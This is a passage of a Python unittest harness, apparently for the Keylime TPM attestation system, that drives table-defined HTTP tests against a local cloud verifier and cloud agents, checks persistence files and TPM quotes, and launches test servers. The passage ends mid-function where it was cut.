"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency": {"instances": 5, "new_thread_function": "new_thread"},
"test_iterations": 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
# "http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness": {
# "prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function": {"name": "launch_cloudagents", "args": {'port_file': 'cloudagent_port.txt', 'num_cloudagent_instances': test_num_cloudagents}},
"state_change_functions": [
{
"pre_function": {"name": "test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations": test_num_cloudagents,
"post_function": {"name": "test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt", "port_file": "cloudagent_port.txt"}},
},
],
"postrun_function": {"name": "kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file': 'cloudagent_port.txt', 'num_cloudagent_instances': test_num_cloudagents}},
},
"test_full_integration_happy_path": {
# "prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb": "GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce": "ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function": {"name": "provide_e"},
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_test_sleep", "argument": 5},
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
],
# "postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_write": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function": {"name": "check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad": {
"prerun_function": {"name": "launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty": {
"prerun_function": {"name": "launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent": {
"prerun_function": {"name": "launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb": "GET",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function": {"name": "test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function": {"name": "kill_cloudverifier", "argument": None},
},
}
# The test_* methods below are thin unittest entry points: each scenario's
# requests, expected statuses and check hooks live in self.test_table under
# the test method's own name, and execute_test_definition() drives them.
def test_concurrent_cloudnodiness(self):
    self.execute_test_definition()

def test_cloudagent_tenant_get_nonce(self):
    self.execute_test_definition()

def test_cloudagent_tenant_get_quote(self):
    self.execute_test_definition()

def test_cloudverifier_tenant_provide_v(self):
    self.execute_test_definition()

def test_concurrent_access(self):
    self.execute_test_definition()

def test_full_integration_happy_path(self):
    self.execute_test_definition()

def test_persistance_file_load(self):
    self.execute_test_definition()

def test_persistance_file_write(self):
    self.execute_test_definition()

def test_persistance_file_bad(self):
    self.execute_test_definition()

def test_persistance_file_empty(self):
    self.execute_test_definition()

def test_persistance_file_nonexistent(self):
    self.execute_test_definition()

def test_cloudagent_cloud_verifier_get_quote(self):
    # Intentionally a no-op: no test_table entry is defined for this scenario.
    pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Table-driven hook: pause for `argument` seconds.

    Returns None (falsy), so a caller that truth-tests the check result
    does not treat the sleep as a failure.
    """
    time.sleep(argument)
# '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
    """Return the line at 0-based index `line_number` of `infile`.

    The newline is preserved; '' is returned when the file is shorter
    than line_number + 1 lines.
    """
    with open(infile) as handle:
        remaining = line_number
        for text in handle:
            if remaining == 0:
                return text
            remaining -= 1
    return ''
def sleep_for_a_while(self, argument):
    """Pre/post hook: sleep for `argument` seconds (string or number)."""
    time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Per-iteration pre-hook for the concurrent cloudnodiness test.

    Rewrites the matching test function's http_request_body in place:
    * recomputes tpm_policy["mask"] from the numeric PCR keys,
    * if cloudagent_ip / cloudagent_port end in ".txt" they are treated as
      file names and replaced with line `test_iteration` of that file,
    * makes agent_id unique per instance by overwriting its tail with the
      (possibly file-sourced) port digits.

    Calls self.fail() if anything goes wrong; otherwise returns None.
    """
    test_record = self.test_table.get(test_method_name)
    # Locate the entry for this test function and rewrite its request body.
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            request_body = test_functions.get("http_request_body")
            try:
                json_request_body = json.loads(request_body)
                tmpp_policy = json_request_body['tpm_policy']
                # Rebuild the PCR mask: one bit per numeric policy key.
                mask = 0
                for key in list(tmpp_policy.keys()):
                    if key.isdigit():
                        mask = mask + (1 << int(key))
                mask_str = "0x%X" % (mask)
                tmpp_policy['mask'] = mask_str
                json_request_body['tpm_policy'] = tmpp_policy
                cloudagent_ip = json_request_body['cloudagent_ip']
                if cloudagent_ip.endswith('.txt'):
                    # IP is indirect: read this iteration's value from the file.
                    cloudagent_ip_file = cloudagent_ip
                    cloudagent_ip_read_from_file = self.read_line_in_file(
                        cloudagent_ip_file, test_iteration)
                    json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip(
                    )
                cloudagent_port = json_request_body['cloudagent_port']
                if cloudagent_port.endswith('.txt'):
                    # Port is indirect as well.
                    cloudagent_port_file = cloudagent_port
                    cloudagent_port_read_from_file = self.read_line_in_file(
                        cloudagent_port_file, test_iteration)
                    json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip(
                    )
                # parser = ConfigParser.RawConfigParser()
                # parser.read(common.CONFIG_FILE)
                # test_agent_uuid = parser.get('general', 'agent_uuid')
                # Derive a per-port uuid: replace the last len(port)
                # characters of agent_id with the port digits.
                test_agent_uuid = json_request_body['agent_id']
                port_string_length = len(
                    str(json_request_body['cloudagent_port']))
                contrived_uuid = test_agent_uuid[:-port_string_length]
                contrived_uuid = contrived_uuid + \
                    str(json_request_body['cloudagent_port'])
                json_request_body['agent_id'] = contrived_uuid
                test_functions['http_request_body'] = json.dumps(
                    json_request_body)
            except Exception as e:
                self.fail(
                    "Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s" % e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
# time.sleep(2)
test_record = self.test_table.get(test_method_name)
# perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
# reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(
json_request_body)
except Exception as e:
self.fail(
"Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s" % e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check: the recorded GET response body must decode to an empty
    JSON container (no agents), proving the verifier started with a fresh
    persistence file.  Calls self.fail() otherwise.
    """
    test_record = self.test_table.get(test_method_name)
    # Find the entry whose recorded response body we should inspect.
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            target_body = test_functions.get("http_result_body_actual")
            try:
                jsondecoded = json.loads(target_body)
                # The decoded body must be empty (no leaked entries).
                if len(jsondecoded) != 0:
                    self.fail(
                        "Expected empty persistence file to replace non existent persistence file on startup.")
            except Exception as e:
                # NOTE(review): this broad except also catches the
                # AssertionError raised by self.fail() above and re-fails
                # with the generic message — confirm that is intended.
                self.fail(
                    "Problem reading persistence file after replacement of empty persistence file. Error: %s" % e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check after a POST: the persistence file must contain exactly
    one entry keyed by `argument` (the agent uuid), and the ".bak" backup
    must still be an empty JSON container.

    Calls self.fail() on any mismatch or read/parse problem.
    """
    test_record = self.test_table.get(test_method_name)
    uuid_str = argument
    # Find the entry for this test function, then inspect the files on disk.
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            try:
                with open(cv_persistence_filename, "r") as persistance_file:
                    file_contents = persistance_file.read()
                json_content = json.loads(file_contents)
                if len(json_content) != 1 or json_content.get(uuid_str) is None:
                    self.fail("Unexpected persistence file contents.")
            except Exception as e:
                # NOTE(review): this also catches the AssertionError raised
                # by self.fail() above and re-fails with a generic message.
                self.fail(
                    "Problem reading persistence file after POST. Error: %s" % e)
            try:
                with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
                    backup_file_contents = backup_persistance_file.read()
                json_backup_content = json.loads(backup_file_contents)
                if len(json_backup_content) != 0:
                    self.fail(
                        "Unexpected backup persistence file contents.")
            except Exception as e:
                self.fail(
                    "Problem reading backup persistence file after POST. Error: %s" % e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check: the recorded GET response must list exactly one active
    agent whose id equals `argument` (the uuid expected to have been
    loaded from the persistence file).  Calls self.fail() otherwise.
    """
    test_record = self.test_table.get(test_method_name)
    uuid_str = argument
    # Find the entry whose recorded response body we should inspect.
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            target_body = test_functions.get("http_result_body_actual")
            jsondecoded = json.loads(target_body)
            # Exactly one active agent, keyed by the expected uuid.
            if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None:
                self.fail("Expected " + uuid_str +
                          " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Post-hook: validate the TPM quote in the recorded response and, if
    valid, encrypt U with the agent's public key and POST it back to the
    cloud agent.

    Reads the module-level secrets U and K and the module-level
    cloudagent/cloudverifier address globals.  Calls self.fail() on a
    missing pubkey/quote, an invalid quote, or a non-200 agent response.
    """
    test_record = self.test_table.get(test_method_name)
    # Find the entry whose recorded response carries pubkey + quote.
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            response_body = test_functions.get("http_result_body_actual")
            jsondecoded = json.loads(response_body)
            public_key = jsondecoded.get("pubkey")
            quote = jsondecoded.get("quote")
            # Both keys must be present before the quote can be validated.
            if public_key is None or quote is None:
                self.fail("Expected both pubkey and quote arguments.")
            else:
                mytenant = tenant.Tenant()
                # command line options can overwrite config values
                mytenant.cloudagent_ip = cloudagent_ip
                mytenant.cloudverifier_ip = cloudverifier_ip
                mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
                if mytenant.validate_tpm_quote(public_key, quote):
                    # encrypt U with the public key
                    global U, K
                    encrypted_U = crypto.rsa_encrypt(
                        crypto.rsa_import_pubkey(public_key), str(U))
                    encrypt_check = crypto.do_hmac(K, mytenant.agent_uuid)
                    b64_encrypted_u = base64.b64encode(encrypted_U)
                    data = {
                        'encrypted_key': b64_encrypted_u,
                        'encrypt_check': encrypt_check
                    }
                    u_json_message = json.dumps(data)
                    # post encrypted U back to Cloud Agent
                    response = tornado_requests.request(
                        "POST", "http://%s:%s/v1/quotes/tenant" % (cloudagent_ip, cloudagent_port), data=u_json_message)
                    if response.status_code != 200:
                        self.fail(
                            "Posting of Encrypted U to the Cloud Agent failed with response code %d" % response.status_code)
                else:
                    # NOTE(review): self.nonce is referenced here but is not
                    # set anywhere in the visible code — confirm it exists
                    # at runtime before this path can report correctly.
                    self.fail(
                        "TPM Quote from cloud agent is invalid for nonce: %s" % self.nonce)
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check: the recorded response body must contain both a "pubkey"
    and a "quote" entry; otherwise the test is failed.
    """
    record = self.test_table.get(test_method_name)
    matching = [entry for entry in record[state_change_or_validation]
                if entry.get("function_name") == test_function_name]
    for entry in matching:
        payload = json.loads(entry.get("http_result_body_actual"))
        # Both keys (with non-null values) are mandatory.
        if payload.get("pubkey") is None or payload.get("quote") is None:
            self.fail("Expected both pubkey and quote arguments.")
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check: compare the recorded response for agent
    06480EC4-6BF3-4F00-8323-FE6AE5868297 against the canned v / ip /
    port / tpm_policy values posted earlier in the scenario.

    Calls self.fail() on the first mismatch.
    """
    test_record = self.test_table.get(test_method_name)
    # lookup test data and compare the results to canned values
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            target_body = test_functions.get("http_result_body_actual")
            jsondecoded = json.loads(target_body)
            v = jsondecoded.get("v")
            ip = jsondecoded.get("ip")
            port = jsondecoded.get("port")
            tpm_policy = jsondecoded.get("tpm_policy")
            if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
                self.fail(
                    "Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
            if ip is None or ip != "127.0.0.1":
                self.fail(
                    "Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
            if port is None or port != "8882":
                self.fail(
                    "Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
            if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
                self.fail(
                    "Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
    """Deep check + cleanup: the recorded response must list exactly
    `argument` agent ids; every listed agent is then deregistered from the
    cloud verifier with a DELETE request.

    Calls self.fail() on a count mismatch or a failed DELETE.
    """
    test_record = self.test_table.get(test_method_name)
    # lookup test data and compare the results to canned values
    for test_functions in test_record[state_change_or_validation]:
        if test_functions.get("function_name") == test_function_name:
            target_body = test_functions.get("http_result_body_actual")
            agent_id_list = json.loads(target_body)
            expected_len = argument
            actual_len = len(agent_id_list)
            if actual_len != expected_len:
                self.fail("Expected " + str(expected_len) +
                          " instance id's but received " + str(actual_len))
            # Deregister each agent so the next scenario starts clean.
            for agent_id in agent_id_list:
                params = {
                    'agent_id': agent_id,
                }
                try:
                    response = tornado_requests.request("DELETE",
                                                        "http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
                                                        params=params)
                    if response.status_code != 200:
                        self.fail("Delete of agent_id " +
                                  agent_id + " failed.")
                except Exception as e:
                    self.fail("Delete of agent_id " + agent_id +
                              " failed with exception: %s" % e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration):
    """Run one table-driven HTTP test step and validate its result.

    Sequence: optional pre_function hook -> HTTP request (body from
    http_request_body or http_request_body_file, never both) -> record
    the actual status/headers/body back into `test_functions` -> validate
    expected status, headers, shallow JSON body and the optional deep
    check_function -> optional post_function hook.  Every mismatch calls
    self.fail().
    """
    # call the pre_function
    pre_function = test_functions.get("pre_function")
    if pre_function is not None:
        pre_function_name = pre_function.get('name')
        pre_function_args = pre_function.get('args')
        # self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
        function_return = getattr(self, pre_function_name)(
            self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args)
        # Pre-hooks signal success with a truthy return value.
        if not function_return:
            self.fail("Test " + self._testMethodName + ":" +
                      test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted.")
    full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get(
        "http_request_port") + test_functions.get("http_request_path")
    http_request_body_tag = test_functions.get("http_request_body")
    http_request_body_file_tag = test_functions.get(
        "http_request_body_file")
    # The two body sources are mutually exclusive.
    if http_request_body_tag is not None and http_request_body_file_tag is not None:
        self.fail("Test " + self._testMethodName + ":" +
                  test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags.")
    thedata = ''
    if http_request_body_tag is None and http_request_body_file_tag is not None:
        thedata = open(http_request_body_file_tag).read()
    else:
        thedata = http_request_body_tag
    verb = test_functions.get("http_request_verb")
    query = test_functions.get("http_request_query", "")
    # NOTE(review): the next call's result is discarded — it looks like a
    # leftover duplicate of the assignment below.
    test_functions.get("http_request_header")
    req_header = test_functions.get("http_request_header")
    response = tornado_requests.request(verb, full_url,
                                        params=query,
                                        data=thedata,
                                        headers=req_header)
    # Spool the streamed response body to a temp file before comparing.
    temp = tempfile.TemporaryFile()
    for chunk in response.iter_content(1024):
        temp.write(chunk)
    temp.seek(0)
    # copy the results for future checking
    test_functions["http_result_status_actual"] = response.status_code
    test_functions["http_result_header_actual"] = response.headers
    test_functions["http_result_body_actual"] = temp.read()
    # validate response status
    if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
        self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(
            test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"]))
    # validate response headers: every expected header must appear verbatim
    if test_functions.get("http_result_header_expected") is not None and not all(item in list(response.headers.items()) for item in list(test_functions["http_result_header_expected"].items())):
        self.fail("Test " + self._testMethodName + ":" +
                  test_functions["function_name"] + ", didn't receive expected headers.")
    # validate (shallow) response body: whole-JSON equality
    if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
        self.fail("Test " + self._testMethodName + ":" +
                  test_functions["function_name"] + ", didn't receive exact expected result body.")
    # validate (deep) response body.
    # NOTE(review): a check hook signals failure by returning a truthy
    # value (or by calling self.fail() itself); None means success.
    check_function = test_functions.get("check_function")
    if check_function is not None:
        check_argument = check_function.get("argument")
        if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
            self.fail("Test " + self._testMethodName + ":" +
                      test_functions["function_name"] + ", didn't receive exact expected result body.")
    # call the post_function
    post_function = test_functions.get("post_function")
    if post_function is not None:
        post_function_name = post_function.get('name')
        post_function_args = post_function.get('args')
        function_return = getattr(self, post_function_name)(
            self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
        if not function_return:
            self.fail("Test " + self._testMethodName + ":" +
                      test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted.")
    temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
    """Worker-thread body for concurrent test execution.

    Pops a unique agent uuid off `queue` (pushed there by new_thread()),
    injects it into the test function's JSON request body, then runs the
    step via execute_the_test().  Always calls queue.task_done(), even on
    failure, so queue.join() in the driver cannot deadlock.
    """
    try:
        # Table data does not provide ability to inject unique agent_id's for each concurrent instance.
        # The queue stores unique agent_id objects, injected by the new_thread function.
        # Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
        http_request_body_tag = test_functions.get("http_request_body")
        http_request_body_file_tag = test_functions.get(
            "http_request_body_file")
        if http_request_body_tag is not None and http_request_body_file_tag is not None:
            self.fail("Test " + self._testMethodName + ":" +
                      test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags.")
        thedata = ''
        if http_request_body_tag is None and http_request_body_file_tag is not None:
            thedata = open(http_request_body_file_tag).read()
        else:
            thedata = http_request_body_tag
        the_uid = queue.get()
        jsondata = json.loads(thedata)
        jsondata['agent_id'] = the_uid
        newdata = json.dumps(jsondata)
        # BUGFIX: the rewritten body was previously computed but never
        # stored, so every concurrent instance posted the same agent_id.
        # Only the inline-body case is written back; a file-sourced body
        # is left untouched (adding the body tag would then trip the
        # both-tags-present check in execute_the_test()).
        if http_request_body_tag is not None:
            test_functions['http_request_body'] = newdata
        # call the inline task passing the new data with the unique agent_id
        self.execute_the_test(
            setup_or_state_change_or_validation, test_functions, test_iteration)
    except Exception as e:
        self.fail("Test " + self._testMethodName + ":" +
                  test_functions["function_name"] + ", unexpected exception error: %s" % e)
    finally:
        queue.task_done()
def modify_persistence_file(self, argument):
    """Seed the cloud verifier persistence file from `argument`.

    argument may be a dict (JSON-encoded), a str (written verbatim), an
    open text file (its contents are copied, then it is closed), or None
    (any existing persistence file is deleted).  When new content is
    written, a stale ".bak" backup is removed as well.
    """
    string_to_write = None
    if isinstance(argument, dict):
        string_to_write = json.dumps(argument)
    elif isinstance(argument, str):
        string_to_write = argument
    elif isinstance(argument, _io.TextIOWrapper):
        # NOTE(review): _io is the private C module; io.TextIOWrapper is
        # the public spelling of the same type.
        string_to_write = argument.read()
        argument.close()
    elif argument is None:
        # No content requested: make sure no stale persistence file survives.
        if os.path.isfile(cv_persistence_filename):
            os.remove(cv_persistence_filename)
    if string_to_write is not None:
        with open(cv_persistence_filename, "w") as persistance_file:
            persistance_file.write(string_to_write)
        backup_file_name = cv_persistence_filename + ".bak"
        if os.path.isfile(backup_file_name):
            os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
    """Prerun hook: seed the persistence file per `argument` (dict / str /
    open file; skipped when None) and start cloud_verifier.py as a
    subprocess.  Always returns True (hook success).

    NOTE(review): args=None skips the persistence-file reset entirely,
    so the "nonexistent file" scenario relies on prior on-disk state —
    confirm that is intended.
    """
    readKUV()
    # modify the persistence file per the passed argument
    if argument is not None:
        self.modify_persistence_file(argument)
    global cv_process
    # shell=True with a constant command string — acceptable in a test
    # harness; keep the command constant.
    cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
    time.sleep(1)  # give the server a moment to start listening
    return True
def overwrite_config_file(self, path, section, option, value):
    """Set `option` = `value` in `section` of the INI file at `path`,
    rewriting the file in place.

    Raises configparser.NoSectionError if the section does not exist.
    """
    parser = configparser.RawConfigParser()
    parser.read(path)
    parser.set(section, option, value)
    # BUGFIX: ConfigParser.write() requires a text-mode handle; the file
    # was previously opened with 'wb', which raises TypeError on Python 3.
    with open(path, 'w') as configfile:
        parser.write(configfile)
def launch_cloudagents(self, argument):
    """Prerun hook: start num_cloudagent_instances cloud agents, each in
    its own sandbox directory with a per-port config and a contrived uuid
    (the base uuid with its tail replaced by the port digits).

    Ports come either from argument["starting_port"] (sequential) or
    line-by-line from argument["port_file"].  Started pids are recorded
    in the module-level cn_process_list for later cleanup.
    """
    # self.launch_cloudverifier(None)
    port_file = argument.get('port_file')
    cloudagent_start_port = argument.get('starting_port')
    num_cloudagent_instances = argument['num_cloudagent_instances']
    if cloudagent_start_port is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        original_cloudagent_port = parser.get('general', 'cloudagent_port')
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            new_dir = r'../cloudagent_on_port_' + \
                str(cloudagent_start_port)
            config_file_path = new_dir + "/keylime.conf"
            # NOTE(review): copy_tree runs before the isdir/mkdir check
            # below, so the mkdir branch looks unreachable — confirm the
            # intended ordering.
            copy_tree('.', new_dir)
            shutil.copyfile(common.CONFIG_FILE, config_file_path)
            if not os.path.isdir(new_dir):
                os.mkdir(new_dir)
            # shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
            self.overwrite_config_file(config_file_path,
                                       'general',
                                       'cloudagent_port',
                                       str(cloudagent_start_port))
            # Contrived uuid: base uuid with its tail replaced by the port.
            port_string_length = len(str(cloudagent_start_port))
            contrived_uuid = test_agent_uuid[:-port_string_length]
            contrived_uuid = contrived_uuid + str(cloudagent_start_port)
            self.overwrite_config_file(
                config_file_path, 'general', 'agent_uuid', contrived_uuid)
            # setsid puts each agent in its own process group so it can be
            # killed with os.killpg() later.
            cn_process_list.append(subprocess.Popen(
                "python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
            cloudagent_start_port = cloudagent_start_port + 1
        # time.sleep(2)
        # Restore the shared config so later launches see the original port.
        self.overwrite_config_file(
            common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
    elif port_file is not None:
        parser = configparser.RawConfigParser()
        parser.read(common.CONFIG_FILE)
        original_cloudagent_port = parser.get('general', 'cloudagent_port')
        test_agent_uuid = parser.get('general', 'agent_uuid')
        for cn in range(num_cloudagent_instances):
            # Per-instance port read from line `cn` of the port file.
            cloudagent_port_read_from_file = self.read_line_in_file(
                port_file, cn).strip()
            new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
            config_file_path = new_dir + "/keylime.conf"
            copy_tree('.', new_dir)
            shutil.copyfile(common.CONFIG_FILE, config_file_path)
            if not os.path.isdir(new_dir):
                os.mkdir(new_dir)
            # shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
            self.overwrite_config_file(
